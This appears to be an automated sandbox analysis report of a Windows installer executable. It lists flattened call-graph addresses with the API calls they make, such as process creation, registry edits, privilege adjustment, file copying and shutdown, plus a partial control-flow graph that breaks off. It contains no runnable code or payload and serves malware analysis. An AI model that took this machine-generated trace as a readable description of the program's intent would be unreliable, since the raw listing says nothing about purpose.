MoveFileW 4270->4271 4272 4016a7 4271->4272 4273 4016a0 4271->4273 4274 40672b 2 API calls 4272->4274 4277 402250 4272->4277 4275 401423 24 API calls 4273->4275 4276 4016b6 4274->4276 4275->4277 4276->4277 4278 4061ae 36 API calls 4276->4278 4278->4273 4286 401e7d 4287 402c41 17 API calls 4286->4287 4288 401e83 4287->4288 4289 402c41 17 API calls 4288->4289 4290 401e8c 4289->4290 4291 402c41 17 API calls 4290->4291 4292 401e95 4291->4292 4293 402c41 17 API calls 4292->4293 4294 401e9e 4293->4294 4295 401423 24 API calls 4294->4295 4296 401ea5 4295->4296 4303 405a14 ShellExecuteExW 4296->4303 4298 401ee7 4299 406873 5 API calls 4298->4299 4301 40288b 4298->4301 4300 401f01 FindCloseChangeNotification 4299->4300 4300->4301 4303->4298 4304 4019ff 4305 402c41 17 API calls 4304->4305 4306 401a06 4305->4306 4307 402c41 17 API calls 4306->4307 4308 401a0f 4307->4308 4309 401a16 lstrcmpiW 4308->4309 4310 401a28 lstrcmpW 4308->4310 4311 401a1c 4309->4311 4310->4311 4312 401000 4313 401037 BeginPaint GetClientRect 4312->4313 4314 40100c DefWindowProcW 4312->4314 4316 4010f3 4313->4316 4317 401179 4314->4317 4318 401073 CreateBrushIndirect FillRect DeleteObject 4316->4318 4319 4010fc 4316->4319 4318->4316 4320 401102 CreateFontIndirectW 4319->4320 4321 401167 EndPaint 4319->4321 4320->4321 4322 401112 6 API calls 4320->4322 4321->4317 4322->4321 4323 401503 4324 40150b 4323->4324 4326 40151e 4323->4326 4325 402c1f 17 API calls 4324->4325 4325->4326 4327 402104 4328 402c41 17 API calls 4327->4328 4329 40210b 4328->4329 4330 402c41 17 API calls 4329->4330 4331 402115 4330->4331 4332 402c41 17 API calls 4331->4332 4333 40211f 4332->4333 4334 402c41 17 API calls 4333->4334 4335 402129 4334->4335 4336 402c41 17 API calls 4335->4336 4338 402133 4336->4338 4337 402172 CoCreateInstance 4342 402191 4337->4342 4338->4337 4339 402c41 17 API calls 4338->4339 4339->4337 4340 401423 24 API calls 4341 402250 4340->4341 4342->4340 4342->4341 4343 402484 4344 402c81 17 API calls 4343->4344 4345 40248e 4344->4345 4346 402c41 17 API calls 4345->4346 4347 402497 4346->4347 4348 4024a2 RegQueryValueExW 4347->4348 4353 40288b 4347->4353 4349 4024c8 RegCloseKey 4348->4349 4350 4024c2 4348->4350 4349->4353 4350->4349 4354 40632f wsprintfW 4350->4354 4354->4349 3764 401f06 3765 402c41 17 API calls 3764->3765 3766 401f0c 3765->3766 3767 405450 24 API calls 3766->3767 3768 401f16 3767->3768 3769 4059d1 2 API calls 3768->3769 3770 401f1c 3769->3770 3771 401f3f FindCloseChangeNotification 3770->3771 3775 40288b 3770->3775 3777 406873 WaitForSingleObject 3770->3777 3771->3775 3774 401f31 3774->3771 3782 40632f wsprintfW 3774->3782 3778 40688d 3777->3778 3779 40689f GetExitCodeProcess 3778->3779 3780 4067fe 2 API calls 3778->3780 3779->3774 3781 406894 WaitForSingleObject 3780->3781 3781->3778 3782->3771 4355 403e86 4356 403fd9 4355->4356 4357 403e9e 4355->4357 4359 403fea GetDlgItem GetDlgItem 4356->4359 4374 40402a 4356->4374 4357->4356 4358 403eaa 4357->4358 4360 403eb5 SetWindowPos 4358->4360 4361 403ec8 4358->4361 4362 40435f 18 API calls 4359->4362 4360->4361 4364 403ee5 4361->4364 4365 403ecd ShowWindow 4361->4365 4366 404014 SetClassLongW 4362->4366 4363 4043ab SendMessageW 4394 404096 4363->4394 4369 403f07 4364->4369 4370 403eed DestroyWindow 4364->4370 4365->4364 4371 40140b 2 API calls 4366->4371 4367 404084 4367->4363 4368 403fd4 4367->4368 4375 403f0c SetWindowLongW 4369->4375 4376 403f1d 4369->4376 4373 4042e8 4370->4373 4371->4374 4372 401389 2 API calls 4377 40405c 4372->4377 4373->4368 4384 404319 ShowWindow 4373->4384 4374->4367 4374->4372 4375->4368 4380 403f94 4376->4380 4381 403f29 GetDlgItem 4376->4381 4377->4367 4382 404060 SendMessageW 4377->4382 4378 40140b 2 API calls 4378->4394 4379 4042ea DestroyWindow EndDialog 4379->4373 4383 4043c6 8 API calls 4380->4383 4385 403f59 4381->4385 4386 403f3c SendMessageW IsWindowEnabled 4381->4386 4382->4368 4383->4368 4384->4368 4388 403f66 4385->4388 4389 403fad SendMessageW 4385->4389 4390 403f79 4385->4390 4398 403f5e 4385->4398 4386->4368 4386->4385 4387 40640a 17 API calls 4387->4394 4388->4389 4388->4398 4389->4380 4392 403f81 4390->4392 4393 403f96 4390->4393 4395 40140b 2 API calls 4392->4395 4396 40140b 2 API calls 4393->4396 4394->4368 4394->4378 4394->4379 4394->4387 4397 40435f 18 API calls 4394->4397 4399 40435f 18 API calls 4394->4399 4415 40422a DestroyWindow 4394->4415 4395->4398 4396->4398 4397->4394 4398->4380 4424 404338 4398->4424 4400 404111 GetDlgItem 4399->4400 4401 404126 4400->4401 4402 40412e ShowWindow EnableWindow 4400->4402 4401->4402 4427 404381 EnableWindow 4402->4427 4404 404158 EnableWindow 4409 40416c 4404->4409 4405 404171 GetSystemMenu EnableMenuItem SendMessageW 4406 4041a1 SendMessageW 4405->4406 4405->4409 4406->4409 4408 403e67 18 API calls 4408->4409 4409->4405 4409->4408 4428 404394 SendMessageW 4409->4428 4429 4063e8 lstrcpynW 4409->4429 4411 4041d0 lstrlenW 4412 40640a 17 API calls 4411->4412 4413 4041e6 SetWindowTextW 4412->4413 4414 401389 2 API calls 4413->4414 4414->4394 4415->4373 4416 404244 CreateDialogParamW 4415->4416 4416->4373 4417 404277 4416->4417 4418 40435f 18 API calls 4417->4418 4419 404282 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4418->4419 4420 401389 2 API calls 4419->4420 4421 4042c8 4420->4421 4421->4368 4422 4042d0 ShowWindow 4421->4422 4423 4043ab SendMessageW 4422->4423 4423->4373 4425 404345 SendMessageW 4424->4425 4426 40433f 4424->4426 4425->4380 4426->4425 4427->4404 4428->4409 4429->4411 3832 401389 3834 401390 3832->3834 3833 4013fe 3834->3833 3835 4013cb MulDiv SendMessageW 3834->3835 3835->3834 4430 404809 4431 404819 4430->4431 4432 40483f 4430->4432 4433 40435f 18 API calls 4431->4433 4434 4043c6 8 API calls 4432->4434 4435 404826 SetDlgItemTextW 4433->4435 4436 40484b 4434->4436 4435->4432 4437 40190c 4438 401943 4437->4438 4439 402c41 17 API calls 4438->4439 4440 401948 4439->4440 4441 405afa 67 API calls 4440->4441 4442 401951 4441->4442 4443 40230c 4444 402314 4443->4444 4445 40231a 4443->4445 4446 402c41 17 API calls 4444->4446 4447 402c41 17 API calls 4445->4447 4449 402328 4445->4449 4446->4445 4447->4449 4448 402c41 17 API calls 4451 40233f WritePrivateProfileStringW 4448->4451 4450 402c41 17 API calls 4449->4450 4452 402336 4449->4452 4450->4452 4452->4448 4453 401f8c 4454 402c41 17 API calls 4453->4454 4455 401f93 4454->4455 4456 4067c2 5 API calls 4455->4456 4457 401fa2 4456->4457 4458 401fbe GlobalAlloc 4457->4458 4460 402026 4457->4460 4459 401fd2 4458->4459 4458->4460 4461 4067c2 5 API calls 4459->4461 4462 401fd9 4461->4462 4463 4067c2 5 API calls 4462->4463 4464 401fe3 4463->4464 4464->4460 4468 40632f wsprintfW 4464->4468 4466 402018 4469 40632f wsprintfW 4466->4469 4468->4466 4469->4460 4470 40238e 4471 4023c1 4470->4471 4472 402396 4470->4472 4474 402c41 17 API calls 4471->4474 4473 402c81 17 API calls 4472->4473 4475 40239d 4473->4475 4476 4023c8 4474->4476 4478 402c41 17 API calls 4475->4478 4480 4023d5 4475->4480 4481 402cff 4476->4481 4479 4023ae RegDeleteValueW RegCloseKey 4478->4479 4479->4480 4482 402d13 4481->4482 4483 402d0c 4481->4483 4482->4483 4485 402d44 4482->4485 4483->4480 4486 406255 RegOpenKeyExW 4485->4486 4487 402d72 4486->4487 4488 402d98 RegEnumKeyW 4487->4488 4489 402daf RegCloseKey 4487->4489 4491 402dd0 RegCloseKey 4487->4491 4493 402d44 6 API calls 4487->4493 4495 402dc3 4487->4495 4488->4487 4488->4489 4490 4067c2 5 API calls 4489->4490 4492 402dbf 4490->4492 4491->4495 4494 402de0 RegDeleteKeyW 4492->4494 4492->4495 4493->4487 4494->4495 4495->4483 4496 40190f 4497 402c41 17 API calls 4496->4497 4498 401916 4497->4498 4499 405a4e MessageBoxIndirectW 4498->4499 4500 40191f 4499->4500 4501 40558f 4502 4055b0 GetDlgItem GetDlgItem GetDlgItem 4501->4502 4503 405739 4501->4503 4546 404394 SendMessageW 4502->4546 4505 405742 GetDlgItem CreateThread CloseHandle 4503->4505 4506 40576a 4503->4506 4505->4506 4508 405795 4506->4508 4509 405781 ShowWindow ShowWindow 4506->4509 4510 4057ba 4506->4510 4507 405620 4513 405627 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4507->4513 4511 4057f5 4508->4511 4515 4057a9 4508->4515 4516 4057cf ShowWindow 4508->4516 4548 404394 SendMessageW 4509->4548 4512 4043c6 8 API calls 4510->4512 4511->4510 4521 405803 SendMessageW 4511->4521 4527 4057c8 4512->4527 4519 405695 4513->4519 4520 405679 SendMessageW SendMessageW 4513->4520 4522 404338 SendMessageW 4515->4522 4517 4057e1 4516->4517 4518 4057ef 4516->4518 4523 405450 24 API calls 4517->4523 4524 404338 SendMessageW 4518->4524 4525 4056a8 4519->4525 4526 40569a SendMessageW 4519->4526 4520->4519 4521->4527 4528 40581c CreatePopupMenu 4521->4528 4522->4510 4523->4518 4524->4511 4530 40435f 18 API calls 4525->4530 4526->4525 4529 40640a 17 API calls 4528->4529 4531 40582c AppendMenuW 4529->4531 4532 4056b8 4530->4532 4533 405849 GetWindowRect 4531->4533 4534 40585c TrackPopupMenu 4531->4534 4535 4056c1 ShowWindow 4532->4535 4536 4056f5 GetDlgItem SendMessageW 4532->4536 4533->4534 4534->4527 4538 405877 4534->4538 4539 4056e4 4535->4539 4540 4056d7 ShowWindow 4535->4540 4536->4527 4537 40571c SendMessageW SendMessageW 4536->4537 4537->4527 4541 405893 SendMessageW 4538->4541 4547 404394 SendMessageW 4539->4547 4540->4539 4541->4541 4542 4058b0 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4541->4542 4544 4058d5 SendMessageW 4542->4544 4544->4544 4545 4058fe GlobalUnlock SetClipboardData CloseClipboard 4544->4545 4545->4527 4546->4507 4547->4536 4548->4508 4549 401491 4550 405450 24 API calls 4549->4550 4551 401498 4550->4551 4559 401d14 4560 402c1f 17 API calls 4559->4560 4561 401d1b 4560->4561 4562 402c1f 17 API calls 4561->4562 4563 401d27 GetDlgItem 4562->4563 4564 402592 4563->4564 4565 404495 lstrcpynW lstrlenW 4566 403a96 4567 403aa1 4566->4567 4568 403aa5 4567->4568 4569 403aa8 GlobalAlloc 4567->4569 4569->4568 3806 402598 3807 4025c7 3806->3807 3808 4025ac 3806->3808 3810 4025fb 3807->3810 3811 4025cc 3807->3811 3809 402c1f 17 API calls 3808->3809 3816 4025b3 3809->3816 3813 402c41 17 API calls 3810->3813 3812 402c41 17 API calls 3811->3812 3814 4025d3 WideCharToMultiByte lstrlenA 3812->3814 3815 402602 lstrlenW 3813->3815 3814->3816 3815->3816 3817 402637 3816->3817 3818 402645 3816->3818 3819 402628 3816->3819 3820 405f90 WriteFile 3817->3820 3823 405fbf SetFilePointer 3819->3823 3820->3818 3824 405fdb 3823->3824 3831 40262f 3823->3831 3825 405f61 ReadFile 3824->3825 3826 405fe7 3825->3826 3827 406024 SetFilePointer 3826->3827 3828 405ffc SetFilePointer 3826->3828 3826->3831 3827->3831 3828->3827 3829 406007 3828->3829 3830 405f90 WriteFile 3829->3830 3830->3831 3831->3817 3831->3818 4570 40451e 4571 404536 4570->4571 4577 404650 4570->4577 4578 40435f 18 API calls 4571->4578 4572 4046ba 4573 404784 4572->4573 4574 4046c4 GetDlgItem 4572->4574 4579 4043c6 8 API calls 4573->4579 4575 404745 4574->4575 4576 4046de 4574->4576 4575->4573 4584 404757 4575->4584 4576->4575 4583 404704 SendMessageW LoadCursorW SetCursor 4576->4583 4577->4572 4577->4573 4580 40468b GetDlgItem SendMessageW 4577->4580 4581 40459d 4578->4581 4582 40477f 4579->4582 4603 404381 EnableWindow 4580->4603 4586 40435f 18 API calls 4581->4586 4604 4047cd 4583->4604 4589 40476d 4584->4589 4590 40475d SendMessageW 4584->4590 4587 4045aa CheckDlgButton 4586->4587 4601 404381 EnableWindow 4587->4601 4589->4582 4594 404773 SendMessageW 4589->4594 4590->4589 4591 4046b5 4595 4047a9 SendMessageW 4591->4595 4594->4582 4595->4572 4596 4045c8 GetDlgItem 4602 404394 SendMessageW 4596->4602 4598 4045de SendMessageW 4599 404604 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4598->4599 4600 4045fb GetSysColor 4598->4600 4599->4582 4600->4599 4601->4596 4602->4598 4603->4591 4607 405a14 ShellExecuteExW 4604->4607 4606 404733 LoadCursorW SetCursor 4606->4575 4607->4606 4608 40149e 4609 4022f7 4608->4609 4610 4014ac PostQuitMessage 4608->4610 4610->4609 4611 401c1f 4612 402c1f 17 API calls 4611->4612 4613 401c26 4612->4613 4614 402c1f 17 API calls 4613->4614 4615 401c33 4614->4615 4616 401c48 4615->4616 4617 402c41 17 API calls 4615->4617 4618 401c58 4616->4618 4619 402c41 17 API calls 4616->4619 4617->4616 4620 401c63 4618->4620 4621 401caf 4618->4621 4619->4618 4623 402c1f 17 API calls 4620->4623 4622 402c41 17 API calls 4621->4622 4624 401cb4 4622->4624 4625 401c68 4623->4625 4626 402c41 17 API calls 4624->4626 4627 402c1f 17 API calls 4625->4627 4628 401cbd FindWindowExW 4626->4628 4629 401c74 4627->4629 4632 401cdf 4628->4632 4630 401c81 SendMessageTimeoutW 4629->4630 4631 401c9f SendMessageW 4629->4631 4630->4632 4631->4632 4633 402aa0 SendMessageW 4634 402ac5 4633->4634 4635 402aba InvalidateRect 4633->4635 4635->4634 4636 402821 4637 402827 4636->4637 4638 402ac5 4637->4638 4639 40282f FindClose 4637->4639 4639->4638 4640 4015a3 4641 402c41 17 API calls 4640->4641 4642 4015aa SetFileAttributesW 4641->4642 4643 4015bc 4642->4643 3510 4034a5 SetErrorMode GetVersion 3511 4034e4 3510->3511 3512 4034ea 3510->3512 3513 4067c2 5 API calls 3511->3513 3514 406752 3 API calls 3512->3514 3513->3512 3515 403500 lstrlenA 3514->3515 3515->3512 3516 403510 3515->3516 3517 4067c2 5 API calls 3516->3517 3518 403517 3517->3518 3519 4067c2 5 API calls 3518->3519 3520 40351e 3519->3520 3521 4067c2 5 API calls 3520->3521 3522 40352a #17 OleInitialize SHGetFileInfoW 3521->3522 3600 4063e8 lstrcpynW 3522->3600 3525 403576 GetCommandLineW 3601 4063e8 lstrcpynW 3525->3601 3527 403588 3528 405cea CharNextW 3527->3528 3529 4035ad CharNextW 3528->3529 3530 4036d7 GetTempPathW 3529->3530 3540 4035c6 3529->3540 3602 403474 3530->3602 3532 4036ef 3533 4036f3 GetWindowsDirectoryW lstrcatW 3532->3533 3534 403749 DeleteFileW 3532->3534 3535 403474 12 API calls 3533->3535 3612 402f30 GetTickCount GetModuleFileNameW 3534->3612 3538 40370f 3535->3538 3536 405cea CharNextW 3536->3540 3538->3534 3541 403713 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3538->3541 3539 40375d 3542 403814 ExitProcess OleUninitialize 3539->3542 3546 403800 3539->3546 3553 405cea CharNextW 3539->3553 3540->3536 3544 4036c2 3540->3544 3545 4036c0 3540->3545 3543 403474 12 API calls 3541->3543 3547 40394a 3542->3547 3548 40382a 3542->3548 3551 403741 3543->3551 3699 4063e8 lstrcpynW 3544->3699 3545->3530 3642 403ad8 3546->3642 3549 403952 GetCurrentProcess OpenProcessToken 3547->3549 3550 4039ce ExitProcess 3547->3550 3702 405a4e 3548->3702 3557 40396a LookupPrivilegeValueW AdjustTokenPrivileges 3549->3557 3558 40399e 3549->3558 3551->3534 3551->3542 3568 40377c 3553->3568 3557->3558 3561 4067c2 5 API calls 3558->3561 3564 4039a5 3561->3564 3562 403840 3565 4059b9 5 API calls 3562->3565 3563 4037da 3566 405dc5 18 API calls 3563->3566 3567 4039ba ExitWindowsEx 3564->3567 3571 4039c7 3564->3571 3569 403845 lstrcatW 3565->3569 3570 4037e6 3566->3570 3567->3550 3567->3571 3568->3562 3568->3563 3572 403861 lstrcatW lstrcmpiW 3569->3572 3573 403856 lstrcatW 3569->3573 3570->3542 3700 4063e8 lstrcpynW 3570->3700 3711 40140b 3571->3711 3572->3542 3575 40387d 3572->3575 3573->3572 3577 403882 3575->3577 3578 403889 3575->3578 3580 40591f 4 API calls 3577->3580 3582 40599c 2 API calls 3578->3582 3579 4037f5 3701 4063e8 lstrcpynW 3579->3701 3583 403887 3580->3583 3584 40388e SetCurrentDirectoryW 3582->3584 3583->3584 3585 4038a9 3584->3585 3586 40389e 3584->3586 3707 4063e8 lstrcpynW 3585->3707 3706 4063e8 lstrcpynW 3586->3706 3589 40640a 17 API calls 3590 4038e8 DeleteFileW 3589->3590 3591 4038f5 CopyFileW 3590->3591 3597 4038b7 3590->3597 3591->3597 3592 40393e 3593 4061ae 36 API calls 3592->3593 3595 403945 3593->3595 3594 4061ae 36 API calls 3594->3597 3595->3542 3596 40640a 17 API calls 3596->3597 3597->3589 3597->3592 3597->3594 3597->3596 3599 403929 CloseHandle 3597->3599 3708 4059d1 CreateProcessW 3597->3708 3599->3597 3600->3525 3601->3527 3603 40667c 5 API calls 3602->3603 3604 403480 3603->3604 3605 40348a 3604->3605 3606 405cbd 3 API calls 3604->3606 3605->3532 3607 403492 3606->3607 3608 40599c 2 API calls 3607->3608 3609 403498 3608->3609 3714 405f0d 3609->3714 3718 405ede GetFileAttributesW CreateFileW 3612->3718 3614 402f73 3641 402f80 3614->3641 3719 4063e8 lstrcpynW 3614->3719 3616 402f96 3617 405d09 2 API calls 3616->3617 3618 402f9c 3617->3618 3720 4063e8 lstrcpynW 3618->3720 3620 402fa7 GetFileSize 3621 4030a8 3620->3621 3625 402fbe 3620->3625 3622 402e8e 32 API calls 3621->3622 3624 4030af 3622->3624 3623 403447 ReadFile 3623->3625 3627 4030eb GlobalAlloc 3624->3627 3624->3641 3722 40345d SetFilePointer 3624->3722 3625->3621 3625->3623 3626 403143 3625->3626 3633 402e8e 32 API calls 3625->3633 3625->3641 3630 402e8e 32 API calls 3626->3630 3629 403102 3627->3629 3634 405f0d 2 API calls 3629->3634 3630->3641 3631 4030cc 3632 403447 ReadFile 3631->3632 3636 4030d7 3632->3636 3633->3625 3635 403113 CreateFileW 3634->3635 3637 40314d 3635->3637 3635->3641 3636->3627 3636->3641 3721 40345d SetFilePointer 3637->3721 3639 40315b 3640 4031d6 44 API calls 3639->3640 3640->3641 3641->3539 3641->3641 3643 4067c2 5 API calls 3642->3643 3644 403aec 3643->3644 3645 403af2 GetUserDefaultUILanguage 3644->3645 3646 403b04 3644->3646 3723 40632f wsprintfW 3645->3723 3648 4062b6 3 API calls 3646->3648 3650 403b34 3648->3650 3649 403b02 3724 403dae 3649->3724 3651 403b53 lstrcatW 3650->3651 3652 4062b6 3 API calls 3650->3652 3651->3649 3652->3651 3655 405dc5 18 API calls 3656 403b85 3655->3656 3657 403c19 3656->3657 3659 4062b6 3 API calls 3656->3659 3658 405dc5 18 API calls 3657->3658 3660 403c1f 3658->3660 3661 403bb7 3659->3661 3662 403c2f LoadImageW 3660->3662 3663 40640a 17 API calls 3660->3663 3661->3657 3666 403bd8 lstrlenW 3661->3666 3670 405cea CharNextW 3661->3670 3664 403cd5 3662->3664 3665 403c56 RegisterClassW 3662->3665 3663->3662 3669 40140b 2 API calls 3664->3669 3667 403810 3665->3667 3668 403c8c SystemParametersInfoW CreateWindowExW 3665->3668 3671 403be6 lstrcmpiW 3666->3671 3672 403c0c 3666->3672 3667->3542 3668->3664 3673 403cdb 3669->3673 3674 403bd5 3670->3674 3671->3672 3675 403bf6 GetFileAttributesW 3671->3675 3676 405cbd 3 API calls 3672->3676 3673->3667 3678 403dae 18 API calls 3673->3678 3674->3666 3677 403c02 3675->3677 3679 403c12 3676->3679 3677->3672 3681 405d09 2 API calls 3677->3681 3682 403cec 3678->3682 3732 4063e8 lstrcpynW 3679->3732 3681->3672 3683 403cf8 ShowWindow 3682->3683 3684 403d7b 3682->3684 3685 406752 3 API calls 3683->3685 3733 405523 OleInitialize 3684->3733 3687 403d10 3685->3687 3689 403d1e GetClassInfoW 3687->3689 3692 406752 3 API calls 3687->3692 3688 403d81 3690 403d85 3688->3690 3691 403d9d 3688->3691 3694 403d32 GetClassInfoW RegisterClassW 3689->3694 3695 403d48 DialogBoxParamW 3689->3695 3690->3667 3696 40140b 2 API calls 3690->3696 3693 40140b 2 API calls 3691->3693 3692->3689 3693->3667 3694->3695 3697 40140b 2 API calls 3695->3697 3696->3667 3698 403d70 3697->3698 3698->3667 3699->3545 3700->3579 3701->3546 3703 405a63 3702->3703 3704 403838 ExitProcess 3703->3704 3705 405a77 MessageBoxIndirectW 3703->3705 3705->3704 3706->3585 3707->3597 3709 405a10 3708->3709 3710 405a04 CloseHandle 3708->3710 3709->3597 3710->3709 3712 401389 2 API calls 3711->3712 3713 401420 3712->3713 3713->3550 3715 405f1a GetTickCount GetTempFileNameW 3714->3715 3716 405f50 3715->3716 3717 4034a3 3715->3717 3716->3715 3716->3717 3717->3532 3718->3614 3719->3616 3720->3620 3721->3639 3722->3631 3723->3649 3725 403dc2 3724->3725 3740 40632f wsprintfW 3725->3740 3727 403e33 3741 403e67 3727->3741 3729 403b63 3729->3655 3730 403e38 3730->3729 3731 40640a 17 API calls 3730->3731 3731->3730 3732->3657 3744 4043ab 3733->3744 3735 405546 3739 40556d 3735->3739 3747 401389 3735->3747 3736 4043ab SendMessageW 3737 40557f OleUninitialize 3736->3737 3737->3688 3739->3736 3740->3727 3742 40640a 17 API calls 3741->3742 3743 403e75 SetWindowTextW 3742->3743 3743->3730 3745 4043c3 3744->3745 3746 4043b4 SendMessageW 3744->3746 3745->3735 3746->3745 3749 401390 3747->3749 3748 4013fe 3748->3735 3749->3748 3750 4013cb MulDiv SendMessageW 3749->3750 3750->3749 4644 404ba6 4645 404bd2 4644->4645 4646 404bb6 4644->4646 4648 404c05 4645->4648 4649 404bd8 SHGetPathFromIDListW 4645->4649 4655 405a32 GetDlgItemTextW 4646->4655 4651 404bef SendMessageW 4649->4651 4652 404be8 4649->4652 4650 404bc3 SendMessageW 4650->4645 4651->4648 4653 40140b 2 API calls 4652->4653 4653->4651 4655->4650 4670 4029a8 4671 402c1f 17 API calls 4670->4671 4672 4029ae 4671->4672 4673 4029d5 4672->4673 4674 4029ee 4672->4674 4678 40288b 4672->4678 4675 4029da 4673->4675 4683 4029eb 4673->4683 4676 402a08 4674->4676 4677 4029f8 4674->4677 4684 4063e8 lstrcpynW 4675->4684 4680 40640a 17 API calls 4676->4680 4679 402c1f 17 API calls 4677->4679 4679->4683 4680->4683 4683->4678 4685 40632f wsprintfW 4683->4685 4684->4678 4685->4678 4686 4028ad 4687 402c41 17 API calls 4686->4687 4688 4028bb 4687->4688 4689 4028d1 4688->4689 4690 402c41 17 API calls 4688->4690 4691 405eb9 2 API calls 4689->4691 4690->4689 4692 4028d7 4691->4692 4714 405ede GetFileAttributesW CreateFileW 4692->4714 4694 4028e4 4695 4028f0 GlobalAlloc 4694->4695 4696 402987 4694->4696 4697 402909 4695->4697 4698 40297e CloseHandle 4695->4698 4699 4029a2 4696->4699 4700 40298f DeleteFileW 4696->4700 4715 40345d SetFilePointer 4697->4715 4698->4696 4700->4699 4702 40290f 4703 403447 ReadFile 4702->4703 4704 402918 GlobalAlloc 4703->4704 4705 402928 4704->4705 4706 40295c 4704->4706 4708 4031d6 44 API calls 4705->4708 4707 405f90 WriteFile 4706->4707 4709 402968 GlobalFree 4707->4709 4713 402935 4708->4713 4710 4031d6 44 API calls 4709->4710 4711 40297b 4710->4711 4711->4698 4712 402953 GlobalFree 4712->4706 4713->4712 4714->4694 4715->4702 4723 401a30 4724 402c41 17 API calls 4723->4724 4725 401a39 ExpandEnvironmentStringsW 4724->4725 4726 401a60 4725->4726 4727 401a4d 4725->4727 4727->4726 4728 401a52 lstrcmpW 4727->4728 4728->4726 4729 402032 4730 402044 4729->4730 4731 4020f6 4729->4731 4732 402c41 17 API calls 4730->4732 4733 401423 24 API calls 4731->4733 4734 40204b 4732->4734 4740 402250 4733->4740 4735 402c41 17 API calls 4734->4735 4736 402054 4735->4736 4737 40206a LoadLibraryExW 4736->4737 4738 40205c GetModuleHandleW 4736->4738 4737->4731 4739 40207b 4737->4739 4738->4737 4738->4739 4749 406831 WideCharToMultiByte 4739->4749 4743 4020c5 4745 405450 24 API calls 4743->4745 4744 40208c 4746 401423 24 API calls 4744->4746 4747 40209c 4744->4747 4745->4747 4746->4747 4747->4740 4748 4020e8 FreeLibrary 4747->4748 4748->4740 4750 40685b GetProcAddress 4749->4750 4751 402086 4749->4751 4750->4751 4751->4743 4751->4744 4757 401735 4758 402c41 17 API calls 4757->4758 4759 40173c SearchPathW 4758->4759 4760 401757 4759->4760 4761 402a35 4762 402c1f 17 API calls 4761->4762 4763 402a3b 4762->4763 4764 402a72 4763->4764 4766 40288b 4763->4766 4767 402a4d 4763->4767 4765 40640a 17 API calls 4764->4765 4764->4766 4765->4766 4767->4766 4769 40632f wsprintfW 4767->4769 4769->4766 4770 4014b8 4771 4014be 4770->4771 4772 401389 2 API calls 4771->4772 4773 4014c6 4772->4773 4774 401db9 GetDC 4775 402c1f 17 API calls 4774->4775 4776 401dcb GetDeviceCaps MulDiv ReleaseDC 4775->4776 4777 402c1f 17 API calls 4776->4777 4778 401dfc 4777->4778 4779 40640a 17 API calls 4778->4779 4780 401e39 CreateFontIndirectW 4779->4780 4781 402592 4780->4781 4782 40283b 4783 402843 4782->4783 4784 402847 FindNextFileW 4783->4784 4787 402859 4783->4787 4785 4028a0 4784->4785 4784->4787 4788 4063e8 lstrcpynW 4785->4788 4788->4787

                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                              Function 004034A5 Relevance: 79.2, APIs: 33, Strings: 12, Instructions: 410stringfilecomCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 0 4034a5-4034e2 SetErrorMode GetVersion 1 4034e4-4034ec call 4067c2 0->1 2 4034f5 0->2 1->2 7 4034ee 1->7 4 4034fa-40350e call 406752 lstrlenA 2->4 9 403510-40352c call 4067c2 * 3 4->9 7->2 16 40353d-40359c #17 OleInitialize SHGetFileInfoW call 4063e8 GetCommandLineW call 4063e8 9->16 17 40352e-403534 9->17 24 4035a6-4035c0 call 405cea CharNextW 16->24 25 40359e-4035a5 16->25 17->16 21 403536 17->21 21->16 28 4035c6-4035cc 24->28 29 4036d7-4036f1 GetTempPathW call 403474 24->29 25->24 30 4035d5-4035d9 28->30 31 4035ce-4035d3 28->31 38 4036f3-403711 GetWindowsDirectoryW lstrcatW call 403474 29->38 39 403749-403763 DeleteFileW call 402f30 29->39 33 4035e0-4035e4 30->33 34 4035db-4035df 30->34 31->30 31->31 36 4036a3-4036b0 call 405cea 33->36 37 4035ea-4035f0 33->37 34->33 54 4036b2-4036b3 36->54 55 4036b4-4036ba 36->55 43 4035f2-4035fa 37->43 44 40360b-403644 37->44 38->39 52 403713-403743 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403474 38->52 56 403814-403824 ExitProcess OleUninitialize 39->56 57 403769-40376f 39->57 48 403601 43->48 49 4035fc-4035ff 43->49 50 403661-40369b 44->50 51 403646-40364b 44->51 48->44 49->44 49->48 50->36 53 40369d-4036a1 50->53 51->50 58 40364d-403655 51->58 52->39 52->56 53->36 60 4036c2-4036d0 call 4063e8 53->60 54->55 55->28 61 4036c0 55->61 64 40394a-403950 56->64 65 40382a-40383a call 405a4e ExitProcess 56->65 62 403804-40380b call 403ad8 57->62 63 403775-403780 call 405cea 57->63 66 403657-40365a 58->66 67 40365c 58->67 71 4036d5 60->71 61->71 80 403810 62->80 84 403782-4037b7 63->84 85 4037ce-4037d8 63->85 68 403952-403968 GetCurrentProcess OpenProcessToken 64->68 69 4039ce-4039d6 64->69 66->50 66->67 67->50 77 40396a-403998 LookupPrivilegeValueW AdjustTokenPrivileges 68->77 78 40399e-4039ac call 4067c2 68->78 81 4039d8 69->81 82 4039dc-4039e0 ExitProcess 69->82 71->29 77->78 92 4039ba-4039c5 ExitWindowsEx 78->92 93 4039ae-4039b8 78->93 80->56 81->82 89 4037b9-4037bd 84->89 86 403840-403854 call 4059b9 lstrcatW 85->86 87 4037da-4037e8 call 405dc5 85->87 100 403861-40387b lstrcatW lstrcmpiW 86->100 101 403856-40385c lstrcatW 86->101 87->56 102 4037ea-403800 call 4063e8 * 2 87->102 94 4037c6-4037ca 89->94 95 4037bf-4037c4 89->95 92->69 99 4039c7-4039c9 call 40140b 92->99 93->92 93->99 94->89 96 4037cc 94->96 95->94 95->96 96->85 99->69 100->56 105 40387d-403880 100->105 101->100 102->62 107 403882-403887 call 40591f 105->107 108 403889 call 40599c 105->108 115 40388e-40389c SetCurrentDirectoryW 107->115 108->115 116 4038a9-4038d2 call 4063e8 115->116 117 40389e-4038a4 call 4063e8 115->117 121 4038d7-4038f3 call 40640a DeleteFileW 116->121 117->116 124 403934-40393c 121->124 125 4038f5-403905 CopyFileW 121->125 124->121 127 40393e-403945 call 4061ae 124->127 125->124 126 403907-403927 call 4061ae call 40640a call 4059d1 